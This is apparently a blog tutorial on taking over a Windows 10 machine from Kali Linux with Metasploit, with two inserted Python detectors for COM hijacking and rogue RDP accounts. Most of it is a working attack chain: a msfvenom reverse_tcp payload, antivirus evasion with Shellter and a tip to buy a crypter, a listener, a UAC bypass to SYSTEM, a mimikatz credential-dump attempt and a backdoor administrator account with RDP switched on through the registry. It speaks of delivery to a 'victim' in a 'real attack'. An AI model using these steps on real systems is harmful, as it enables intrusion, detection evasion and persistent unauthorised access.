In this article we will see how we can access a Windows 10 machine from Kali Linux, and more specifically with Metasploit. We have talked about Metasploit's functionality in the past. We have already installed Windows 10 in a virtual machine and we will try to gain access with an infected .exe file.
Create an infected .exe file
To create the executable .exe file, open your terminal and type the following command:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=192.168.100.4 LPORT=4444 -o /root/something32.exe
This creates a payload for a 32-bit Windows 10 machine.
To find our IP address, we use the ifconfig command inside Kali, specifying the interface eth0 (since we are on Ethernet):
The following screenshot shows the results of the command for the successful creation of the .exe file:
The next step is to make the executable .exe file we created, undetectable by security programs.
Making the FUD executable file
To make our file undetectable, we will use Shellter. Shellter injects the payload into an executable and rewrites the file so that it no longer matches the malicious file's known signatures, producing a new and unique file that antivirus does not detect.
In Kali Linux, download Shellter with the following command:
sudo apt-get install shellter
To run Shellter, just type shellter in your terminal.
You will be prompted to enter the path to the executable file to make it FUD. Make sure you select the "Auto" mode as shown below.
Shellter will then perform some tests and ask you if you want to run the stealth function. Select "Y" for yes.
The next prompt asks for the payload, and here we will use the file we created at the beginning with msfvenom. Type "L" to choose from the list of built-in payloads unless you want to proceed with your own custom payload, then select the payload to use. We need Meterpreter_Reverse_TCP, so we choose option "1".
Type LHOST and LPORT and press Enter. Shellter will complete the process and ask you to press Enter.
At this point, our file has become undetectable by all antivirus and other security programs.
You could buy your own crypter that is constantly updated and remains undetectable in the long run. Shellter will keep your file hidden for a while, but at some point its output will be added to antivirus signature databases and detected.
Now we need to create a listener on the port we specified inside the executable file. We do this with Metasploit, using the msfconsole command on the Kali Linux terminal.
The following screenshot shows which commands to use in Metasploit. First, we tell Metasploit to use the generic payload handler multi/handler:
use multi/handler
Next, we configure the payload to match the one inside the executable file:
set payload windows/meterpreter/reverse_tcp
Then we set LHOST and LPORT to the same values we used when creating the payload:
set LHOST 192.168.100.4
set LPORT 4444
When done, type "run" or "exploit" and press Enter.
If all goes well, the following snapshot will appear: the reverse TCP handler is now waiting for a connection.
The next step is to run the Windows executable file. How you deliver it to your victim in a real attack is your own problem and something we will not analyze now, because we have already covered it in the past.
Execution of Payload
So we transfer our file to Windows and run it.
Running the file executes the payload, which opens a connection back to our attack machine (Kali Linux). Immediately, we get a Meterpreter session on Kali Linux. The meterpreter > prompt confirms this, as shown below:
Since the file was not executed as an "administrator", there are Meterpreter commands that cannot be executed and would instead return "access denied". This can be confirmed by running the getuid command, which tells us that we are running as the user l3s7r0z.
To show that the user does not have enough privileges, we tried to run the command mimikatz_command -f sekurlsa::logonPasswords.
The result is an "Access is denied" message, as shown below:
To gain sufficient rights, we must bypass UAC. In the next step, we will see how this can be done.
Privilege escalation allows us to increase our privileges (or rights, if you prefer) from a less privileged user (l3s7r0z) to a more privileged one, preferably the SYSTEM account, which has all administrator rights.
Metasploit by default provides us with some methods that allow us to increase our privileges. In the Meterpreter command line, we use the getsystem command, as shown below:
Since all the methods used by getsystem fail, we need an alternative way to increase our privileges.
We will use the comhijack exploit module to bypass User Account Control (UAC).
To do this, we send our Meterpreter session to the background, switch from multi/handler to the windows/local/bypassuac_comhijack exploit, and point it at the backgrounded session with set SESSION 2.
Next, we set the payload to windows/x64/meterpreter/reverse_tcp together with LPORT and LHOST. Then we run the exploit.
We successfully receive a new Meterpreter session. We can type "sysinfo" to see information about our target. getuid shows that we are still running as the user l3s7r0z on Windows 10, but we can now elevate to SYSTEM by running "getsystem".
We can see that the elevation succeeded, and we confirm it by running "getuid" again: we are now NT AUTHORITY\SYSTEM.
At this point we have full access to Windows and can take the data we want, such as passwords, files of interest, etc.
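A defender-side note on this step, added here and not part of the original article: the comhijack module's name refers to COM hijacking, in which a per-user CLSID registration under the user's own registry hive shadows the machine-wide one, so a higher-integrity process that loads that CLSID picks up the planted server instead. The Python below is an example written for this page, not Metasploit's or the article's code; it scans Sysmon registry events (ids 12 and 13) for COM server keys written under a user hive, which is the trace this class of bypass leaves. The event field names (id, image, target_object, details) and the sample events are constructed, and the code assumes Sysmon renders HKCU paths as HKU\<user SID>\Software\Classes\... or HKU\<user SID>_Classes\..., both of which it handles.

```python
import re

# Sysmon RegistryEvent ids: 12 = key created/deleted, 13 = value set.
REGISTRY_EVENT_IDS = {12, 13}

# Per-user COM registration under the user's hive. Sysmon renders HKCU paths
# as HKU\<user SID>\Software\Classes\... or HKU\<user SID>_Classes\... (an
# assumption stated in the lead-in; both forms are matched). A server registered
# here shadows the HKLM entry for the same CLSID in that user's processes.
COM_HIJACK_RE = re.compile(
    r"^HKU\\(?P<sid>S-1-5-21-[\d-]+)(?:\\Software\\Classes|_Classes)\\CLSID\\"
    r"(?P<clsid>\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\})\\"
    r"(?P<server>InprocServer32|LocalServer32|TreatAs|ScriptletURL)\b",
    re.IGNORECASE,
)

# Constructed sample events (not real logs), already parsed into dicts.
SAMPLE_EVENTS = [
    # Constructed: a user-hive CLSID override written by an unelevated process.
    {"id": 13, "image": r"C:\Users\l3s7r0z\Downloads\something32.exe",
     "target_object": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001_Classes"
                      r"\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32\(Default)",
     "details": r"C:\Users\l3s7r0z\AppData\Local\Temp\x.dll"},
    # Constructed benign noise: an installer registering a COM server machine-wide.
    {"id": 13, "image": r"C:\Windows\System32\msiexec.exe",
     "target_object": r"HKLM\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-555555555555}"
                      r"\InprocServer32\(Default)",
     "details": r"C:\Program Files\Vendor\vendor.dll"},
    # Constructed benign noise: a per-user setting that is not a COM registration.
    {"id": 13, "image": r"C:\Windows\explorer.exe",
     "target_object": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
                      r"\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "details": "DWORD (0x00000001)"},
    # Constructed: a non-registry Sysmon event (process create) is ignored.
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe"},
]


def find_com_hijacks(events):
    """Return one finding per registry event that registers a COM server under
    a user's hive: which CLSID was overridden, by which process, and what the
    new server path is."""
    findings = []
    for ev in events:
        if ev.get("id") not in REGISTRY_EVENT_IDS:
            continue
        m = COM_HIJACK_RE.match(ev.get("target_object", ""))
        if not m:
            continue
        details = ev.get("details", "")
        findings.append({
            "sid": m.group("sid"),
            "clsid": m.group("clsid").upper(),
            "server_key": m.group("server"),
            "image": ev.get("image", ""),
            "details": details,
            # A server DLL in a user-writable directory is the usual sign of a
            # hijack rather than a legitimate per-user COM registration.
            "user_writable_server": details.lower().startswith("c:\\users\\"),
        })
    return findings


if __name__ == "__main__":
    for f in find_com_hijacks(SAMPLE_EVENTS):
        print(f"COM hijack candidate: {f['clsid']} {f['server_key']} -> "
              f"{f['details']} written by {f['image']}")
```

In a real deployment the input would come from the Sysmon operational log rather than an inline list; the useful follow-up is to compare the flagged CLSID against its HKLM registration and to check whether the writing process is one that should ever register COM servers for a user.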
We will now see how we maintain the access we have to our victim even when the target decides to correct the vulnerability.
We will achieve this by activating RDP. In simple words we will have our own account within the target and we will activate the RDP so that whenever we want, we can connect to the machine and access the information we want.
In the Meterpreter session, we open a command shell, which gives us a Windows command prompt on our target (Windows 10).
At the C:\WINDOWS\system32> prompt, we run the command net users. This lists all Windows users. As we can see, there are only two: Administrator and the user l3s7r0z.
We add a new user, jaime, and give it the password Bru73f0rc3_.
The command used to do this is:
net user /add jaime Bru73f0rc3_
We then add jaime to the Administrators group so that the account can perform administrative functions. The command we use is:
net localgroup administrators jaime /add
Then we add it to the Remote Desktop Users group. This will allow us to connect to the machine via RDP even after the original infection has been removed by antivirus programs.
The command we use is:
net localgroup "Remote Desktop Users" jaime /add
Once the configuration for jaime is complete, we can use the following command to see the properties of the account:
net user jaime
The following snapshot shows the results of the command.
In some cases, RDP is not enabled on the victim machine. While we are in the shell, we can activate it by adding a registry key.
To enable RDP, use the following command:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
If you want to disable RDP for any purpose, you can do so by typing the following command:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
The result of the operation is shown below:
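The account and registry changes above leave a clear trail in the Windows Security log (event 4720 for a user account created, 4732 for a member added to a security-enabled local group) and, where Sysmon is deployed, in event 13 for the fDenyTSConnections value being set. The Python below is an added example for this page, not code from the article, that correlates those three signals into one finding per account and grades it. The events are a constructed, already-parsed list with assumed field names (source, id, subject, target_user, member, group_sid, image, target_object, details); the well-known group SIDs S-1-5-32-544 (Administrators) and S-1-5-32-555 (Remote Desktop Users) are real.

```python
import re
from collections import defaultdict

# Well-known SIDs of the two local groups the walkthrough adds the account to.
ADMINISTRATORS_SID = "S-1-5-32-544"
REMOTE_DESKTOP_USERS_SID = "S-1-5-32-555"
PRIVILEGED_SIDS = {ADMINISTRATORS_SID, REMOTE_DESKTOP_USERS_SID}

# The value the reg add command flips; Sysmon event 13 reports the full path in
# TargetObject and the new data as e.g. "DWORD (0x00000000)".
RDP_DENY_FLAG_RE = re.compile(
    r"\\Control\\Terminal Server\\fDenyTSConnections$", re.IGNORECASE)

# Constructed sample events (not real logs): a minimal, already-parsed view of
# Security 4720/4732 and Sysmon 13 records in the order they were written.
SAMPLE_EVENTS = [
    {"source": "Security", "id": 4720, "subject": "l3s7r0z", "target_user": "jaime"},
    {"source": "Security", "id": 4732, "subject": "l3s7r0z", "member": "jaime",
     "group_sid": ADMINISTRATORS_SID},
    {"source": "Security", "id": 4732, "subject": "l3s7r0z", "member": "jaime",
     "group_sid": REMOTE_DESKTOP_USERS_SID},
    {"source": "Sysmon", "id": 13, "image": r"C:\Windows\System32\reg.exe",
     "target_object": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "details": "DWORD (0x00000000)"},
    # Benign noise: an existing service account added to Backup Operators.
    {"source": "Security", "id": 4732, "subject": "Administrator", "member": "backupsvc",
     "group_sid": "S-1-5-32-551"},
]


def analyze(events):
    """Correlate the three signals into per-account findings.

    Severity: 'high' when a newly created account was added to Administrators
    or Remote Desktop Users and RDP was enabled in the same batch, 'medium'
    when an account was added to one of those groups without the registry
    change, 'low' for a creation with no privileged group membership.
    """
    created = {}               # account -> who created it
    groups = defaultdict(set)  # account -> privileged group SIDs it was added to
    rdp_enabled_by = []        # processes that set fDenyTSConnections to 0

    for ev in events:
        if ev["source"] == "Security" and ev["id"] == 4720:
            created[ev["target_user"].lower()] = ev["subject"]
        elif ev["source"] == "Security" and ev["id"] == 4732:
            if ev["group_sid"] in PRIVILEGED_SIDS:
                groups[ev["member"].lower()].add(ev["group_sid"])
        elif ev["source"] == "Sysmon" and ev["id"] == 13:
            if (RDP_DENY_FLAG_RE.search(ev["target_object"])
                    and ev["details"].endswith("(0x00000000)")):
                rdp_enabled_by.append(ev["image"])

    findings = []
    for account in sorted(set(created) | set(groups)):
        sids = groups.get(account, set())
        if sids and rdp_enabled_by and account in created:
            severity = "high"
        elif sids:
            severity = "medium"
        else:
            severity = "low"
        findings.append({
            "account": account,
            "created_by": created.get(account),
            "admin": ADMINISTRATORS_SID in sids,
            "rdp_group": REMOTE_DESKTOP_USERS_SID in sids,
            "rdp_enabled_by": list(rdp_enabled_by),
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['severity']}] account {f['account']} created by {f['created_by']}, "
              f"admin={f['admin']}, rdp_group={f['rdp_group']}, "
              f"rdp enabled by {f['rdp_enabled_by']}")
```

The grading deliberately treats a group addition alone as medium: an existing account being placed in Remote Desktop Users is worth a look even when no new account was created, while the combination of all three events in one batch is what the walkthrough above produces and should page someone.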
From Kali Linux, we can use the remmina remote client. If it is not installed in Kali, you can install it by typing the following command:
apt-get install remmina
Start remmina by typing remmina at the command prompt and logging in to the target using its IP address.
You will be prompted to accept a certificate. Do so, and use the username and password you used when creating the jaime account, as shown below:
By default, Windows 10 requires the currently logged-in user to allow you to sign in. However, if they do not respond within 30 seconds, they are automatically logged out.